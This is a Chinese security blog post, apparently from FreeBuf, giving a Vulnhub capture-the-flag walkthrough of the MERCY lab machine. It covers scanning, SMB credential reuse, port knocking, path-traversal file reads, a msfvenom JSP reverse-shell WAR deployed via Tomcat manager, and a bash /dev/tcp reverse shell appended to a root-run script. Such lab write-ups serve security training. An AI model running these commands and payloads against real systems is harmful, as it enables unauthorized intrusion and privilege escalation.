官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

[Vulnhub] MERCY SMB+RIPS-LFI+Tomcat+Ports-Knocking+Timeclock权限提升

maptnh 2024-07-19 22:21:23 50020

本文由 maptnh 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

信息收集

IP Address	Opening Ports
192.168.101.151	TCP:80,22,53, 110, 139, 143, 445, 993, 995, 8080

$ $ nmap -p- 192.168.101.151 --min-rate 1000 -sC -sV

PORT     STATE SERVICE     VERSION
53/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: UIDL TOP STLS AUTH-RESP-CODE RESP-CODES PIPELINING SASL CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: LITERAL+ IDLE SASL-IR more listed IMAP4rev1 OK LOGIN-REFERRALS capabilities ENABLE LOGINDISABLEDA0001 STARTTLS post-login have Pre-login ID
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ IDLE more listed IMAP4rev1 SASL-IR LOGIN-REFERRALS AUTH=PLAINA0001 OK capabilities ENABLE post-login have Pre-login ID
995/tcp  open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_pop3-capabilities: UIDL TOP PIPELINING AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) CAPA
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests

本地权限

http://192.168.101.151:8080/robots.txt

$ echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg=='|base64 -d

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

$ enum4linux 192.168.101.151

pleadformercy
qiu
thisisasuperduperlonguser
fluffy

username:qiu
password:password

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password'

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password' -s qiu -r --depth 10

$ smbclient //192.168.101.151/qiu -U qiu

smb: \> lcd ./dev
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

$ cat .private/opensesame/config

通过端口敲门开放SSH和HTTP端口

http:159,27391,4
ssh:17301,28504,9999

$ knock 192.168.101.151 17301 28504 9999 -d 300 -v

$ knock 192.168.101.151 159 27391 4 -d 300 -v

$ dirb http://192.168.101.151/

http://192.168.101.151/robots.txt

http://192.168.101.151/nomercy/

http://192.168.101.151/mercy/

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../etc/passwd

$ whatweb http://192.168.101.151:8080 -v

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

username:fluffy
password:freakishfluffybunny

username:thisisasuperduperlonguser
password:heartbreakisinevitable

http://192.168.101.151:8080/manager/html

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.128 LPORT=10032 -f war >reverse.war

http://192.168.101.151:8080/reverse/

Local.txt 截屏

alt text

Local.txt 内容

Plz have mercy on me! :-( :-(

权限提升

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat7@MERCY:/var/lib/tomcat7$ su fluffy

$ ls -la /home/fluffy/.private/secrets

$ ./pspy32

$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'">>/home/fluffy/.private/secrets/timeclock

Proof.txt 截屏

Proof.txt 内容

Congratulations on rooting MERCY. :-)

# web安全

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

maptnh

Ценность жизни выше, чем кража данных.

已在FreeBuf发表 338 篇文章

本文为 maptnh 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

Vulnhub

展开更多